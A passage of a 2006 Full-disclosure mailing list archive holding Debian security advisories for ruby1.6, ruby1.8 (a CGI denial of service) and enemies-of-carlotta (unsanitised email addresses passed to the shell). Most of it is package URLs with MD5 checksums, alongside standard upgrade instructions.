  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   148254 ad34b408344d58f4e8c2e30bdf706d68
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   597000 21297ad50a979da1df0ebc5f353e8299
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   148520 3c56784f75ea9e20ce2b275fbcfae8b1
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   165306 fd2b06b8355ec690513783ee62448e37
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   795282 2211b0dda333ff7a861b717a9a37eca2
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   159026 06b570dc2bbe4d2fc58268dd59274f7f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   145876 e3c3d1d9c2b3a35aef20ef1a0986bf89

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   143654 6b309f76fe2ff7c5b187c5a2004e9c3f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   632544 55b471abec72f2b422c7650d920770f7
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   164386 f0efaab289dff936b8a56dd0329912be
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   158778 42acaabd98aa5af61bad0653076c8cee
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   144622 af8c21e14e38fc383ee4095cda5465cc
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   144468 3f2541a2fe8e3125d5997695006de29d
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   662688 d6f73972dcf03d841700326f6fe86561
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   574262 8f6383d4dec3097c2ad37d3018848347
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   178380 418713d2b2aec8144d4457e22a465a7a
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   144856 c18f17360cb67e531c965cf6bbbc8d56
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   143708 09a2b7cb67f15356c393153b5f99f791
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   147588 982f0365e109a376f9adc9816b4bc2a3
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_sparc.deb
    Size/MD5 checksum:   146426 7b3d03250dc47f317f4d3c31dbcbf851


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFf+3jwM/Gs81MDZ0RAvH6AJ9ovjhIS/RtktqWaMAWAyGFuPay7wCg0g/R
i8HTUq3FG9qbC4pm0KKBCsw=
=dGsu
-----END PGP SIGNATURE-----



From skx at debian.org  Wed Dec 13 12:18:52 2006
From: skx at debian.org (Steve Kemp)
Date: Wed, 13 Dec 2006 12:18:52 +0000
Subject: [Full-disclosure] [SECURITY] [DSA-1235-1] New ruby1.8 package fix
	denial of service
Message-ID: <20061213121852.GA1954@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1235-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
December 13, 2006
- ------------------------------------------------------------------------

Package        : ruby1.8
Vulnerability  : Denial of service
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5467
Debian Bug     : 398457

A denial of service vulnerability has been discovered in the CGI library
included with Ruby, the intepreted scripting langauge for quick and easy
object-orientated programming.

For the stable distribution (sarge), this problem has been fixed in version
1.8.2-7sarge5.

We recommend that you upgrade your ruby1.8 package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5.dsc
    Size/MD5 checksum:     1024 912f2bb9a68ba4c1dcad47ebded0946f
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2.orig.tar.gz
    Size/MD5 checksum:  3623780 4bc5254bec262d18cf1ceef03aae8bdf
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5.diff.gz
    Size/MD5 checksum:   537107 452d8fc55dd8b09fcce1fa843146316e

Architecture independent packages:

  http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.2-7sarge5_all.deb
    Size/MD5 checksum:   234904 3c678d4f692f0a815f8e123ce1ec5cbc
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.2-7sarge5_all.deb
    Size/MD5 checksum:   142342 8aa7ade9e0b3af75caf49850d61188f8
  http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.2-7sarge5_all.deb
    Size/MD5 checksum:   166572 9d149f07d1d580561c8fd139b2505806
  http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.2-7sarge5_all.deb
    Size/MD5 checksum:   721046 ca07956a53ad6032c5770d36f6b83be6
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.2-7sarge5_all.deb
    Size/MD5 checksum:   219032 4a2eec33f380b225db9c3b73d4925872

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   796230 c83c345488cb4d6073af0094e3343657
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   237746 b57a4a2a3d3029098e5ec51456dfbf96
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   133570 d59fed9aabc5fd7bd85e52a5994885ee
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:  1468624 30354f8ce99453f748a2b73c0ecbe35d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   137664 598deb2773a96cc9a3d6c6aa50d41970
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:  1450302 90a592d6acc3c433e3055b7d48d72619
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   152112 30df21197d9c6f4f79173d4010bececa
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   136106 7bfe56ddd935299f5725d391c7d87c29
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_alpha.deb
    Size/MD5 checksum:   827214 cea044e68e0b5c823d99a675c2382e0a

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   234196 3c6eeabc8701ba4362f4688b2806e08d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:  1392588 c04ec457b39ebeca3a657b89be94be10
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   151770 d04f1108db6e218b5ec17f1f63433aa3
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   780908 efe048b111da22bc9fa7d0272e9f0e73
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   132778 de3de7b9de8500725f6801528003bdcd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:  1446914 e9d5e1518d9d5f4104c388d8a76ea54b
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   649342 ecdf8db978bbfbd1ff76deb70f7c99f8
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   135458 48edc1640fe2e46c76be6142cd0f653b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_amd64.deb
    Size/MD5 checksum:   136936 99428965f5fa05692ccb1cd4d0cfb93b

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   660602 0e3ba8cb5f5e6aed2e82183d6adf438e
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   743978 34addffb617940e82a921f7b3fbd4971
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   222524 95aaaff374f1eca459909e41d73281f3
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   135618 3299078b49a0d18e8c1ba1df6053374c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   131882 d624363743612f51583dc365aece3a6c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:  1348448 30160581763c0ca181a27051972f49b7
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   134512 cc792f596cda0a76187ad0d87f9a78dd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:  1441176 fff2f3b698f470e59ae7d1fc38213bee
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_arm.deb
    Size/MD5 checksum:   151616 d44dda05ff32853bacf61558a75d329e

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:  1453746 324d6165b61f85361d235c84232f9c57
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   840092 cefc1185f43039b7bb312b8d9eaf446d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   138316 e6cdba374c69f955382b507829246d0b
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   736170 c363eb08f4cb707fb38b84d384aaed21
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   133848 1f547a7149e324c2be82b9ea7721e747
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   136670 cf7e020365d2c1e0f47a07d4ef2afcaf
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:  1501190 a554170ecc2e0a5c8c20e1244e08b42b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   246992 9b222eff056b6cfef4be08be31b14a24
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_hppa.deb
    Size/MD5 checksum:   152186 c6c89f82e6a10eaab2d320ba7f3452a4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   134832 69fe160eaa7a61e977758ca8840f2f68
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:  1473438 d403bf6278df17c91cd29832e217d180
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   132066 217be9ae92eac89f2c0e02382bc63927
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   622628 81d3722ed53eeacbc154338472e27b75
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   758384 7511dc65739e94a64f517aad719e1bc3
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   151662 5feafa4bbbcc724ee26d79fe7ff30f3f
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:  1359432 1c9fc5e0c26b059be2f962d41bde1a4f
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   136006 00832183a598d7f2bdaa18b711fafad8
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_i386.deb
    Size/MD5 checksum:   225248 b7817d365ceee9e6da596e7cb360477b

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   152520 32884dc2d4d81a84bff3bd13cb734d2b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   998786 f538ed28e4a5a1e8b94aa240b72b44e1
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   867704 7aedeff3ca8fd793867c87bde17a0a76
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   265788 abfcef422b02e874dccefaad35c1f519
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   135912 0d6604955f68bf6e4b3712a5634dcb4a
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:  1463086 2213dd9375aa10fb8e049a517a6a86df
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:  1704178 923e50fedde26c1d4f7cd3dd98cfcdee
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   140554 e19468af83ef08fcf1d9201b2785112e
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_ia64.deb
    Size/MD5 checksum:   138710 e76a6815cc508d16509c73cb95dcbc84

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   230926 3dfb38f37e0d6aec8f084f528d31f63f
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   135930 ff3e15385d509399921ce4d5005742fd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   730266 d9bf2e21bfadfd427310371fd51b5115
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   553324 16c3f3374ae776484fded03f8db92965
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:  1333048 68a6602dde0f45986ed8a54675b7717c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   132220 b6bceda24dbdfd364734c43745556c99
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   134532 3245f121451f94fa4d921f25bd75e16d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:  1439658 23889e93e548b1d45c90a8b7e64a73b3
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_m68k.deb
    Size/MD5 checksum:   151552 27d9d1d7216184b5cc91f363463e3bfe

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   215622 402d070be4eda4e233f7e1d3f0c3c392
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   152320 9c03debe81a9cde0d337668e45d8e132
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   684456 05543ea183c6bebcd879fd060f8c2716
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   763988 b4ad8c337b7a250fb0e41e9b67d19c81
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   131774 2c0c8c5958cff11815b7d8b7541c01c6
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   134312 79d335494bfdd25c747ea37cb878f643
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:   135682 09f2a8bbedd8fc5b3db44cad299e1e9b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:  1436104 08da269ec8259ead00b1c6fa4946fe5d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_mips.deb
    Size/MD5 checksum:  1356252 4edbd816da55af2ed1b442cee599b38e

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:  1436276 4c612c84dc2582aa309639f59905c0fa
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   135708 2f21d089db63a23c7cd19a9afad3b2ae
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   134338 9ca8f44c8bfef60b7e143773b033f131
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   152314 14914c49f3f053273a6bb0110355a104
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:  1357612 f5f95bc1374529043a55f2bcd09ab021
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   214848 51bf577ec7cded96309dd115643c6dbe
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   678152 ff55955ee9df9264c9093563b160c4d9
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   756850 3cc935447b76a50319e8789536a9da16
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_mipsel.deb
    Size/MD5 checksum:   131738 04c13c8568b54c366b89a32979eafe9f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   153474 ed53f886f5d7885ee090cf1e4d21124c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   970434 79062de7e5ff12a997b6b7b8a3538000
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:  1406404 d9095111417711d8e0349bc9c6350359
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   138038 b8476508d3043c5cbadeb65fd714d18b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:  1444486 140c09dc87544d5ad17928cfe636ce9c
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   136900 0dc3553d639fccf0a046e2194c9798e3
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   133950 1383efe626c84680889bd9ed10e34646
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   225206 0f671c8aa9ac26d37dba279879a577fe
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_powerpc.deb
    Size/MD5 checksum:   621408 99e37bf125e6752deaa5e43073face38

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   674956 77eb588bcc256b8c8deac0888c943aa6
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   240012 41424b52d67ce57ec9ba7c766fefff3d
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   137292 076f97dc2adeaf7bd50ae05d69b7ccc8
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:  1431026 9fe325e746e648e44ea8dd5281b00b63
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:  1447344 73803fc844bf00e8e10de5c623384271
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   151842 0f315ef8f7fe6760821041eb703571a5
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   907324 733552cb6eeeef66aee92df2e0313cbd
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   133274 d2124662357a9ab65e80a39df176617b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_s390.deb
    Size/MD5 checksum:   135946 2d1bc2dd26c33d13976c03bab726cb90

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   134790 ad648350a34f40e1707cb9900d921a02
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   135994 bbdfc1b02895ba5840e1dfcb24e86455
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   229210 674972fbdae85fb9e27e96f17b152729
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   748414 cb6fa250ab3a8de01795e1c18d722ce9
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:  1373300 a67833937bdc3c8582ad814c81062a5b
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:  1442124 233233f5f41d10c4f4569ba56bb972a5
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   132142 f073ab78d23ddf91d2a1aac3df82fd36
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   646830 2486a6445c65bd4ea472b191a2632dfd
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.2-7sarge5_sparc.deb
    Size/MD5 checksum:   151616 5dcfbbe976ad2cc05a8f4e7ff0764b16


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFf+94wM/Gs81MDZ0RAtAeAJ4o7GmZZlYU0R6+kqYuDIfxwcKldACgwBof
ohCUcoguTcsDeEVDch0aLe8=
=wCeS
-----END PGP SIGNATURE-----



From skx at debian.org  Wed Dec 13 12:29:10 2006
From: skx at debian.org (Steve Kemp)
Date: Wed, 13 Dec 2006 12:29:10 +0000
Subject: [Full-disclosure] [SECURITY] [DSA-1236-1] New enemies-of-carlotta
	package fix missing sanity checks
Message-ID: <20061213122910.GA2380@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1236-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
December 13, 2006
- ------------------------------------------------------------------------

Package        : enemies-of-carlotta
Vulnerability  : missing sanity checks
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5875

Antti-Juhani Kaijanaho discovered that enemies-of-carlotta, a simple
manager for mailing lists, does not properly sanitise email addresses
before passing them through to the system shell.

For the stable distribution (sarge), this problem has been fixed in version 
1.0.3-1sarge1

We recommend that you upgrade your enemies-of-carlotta package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

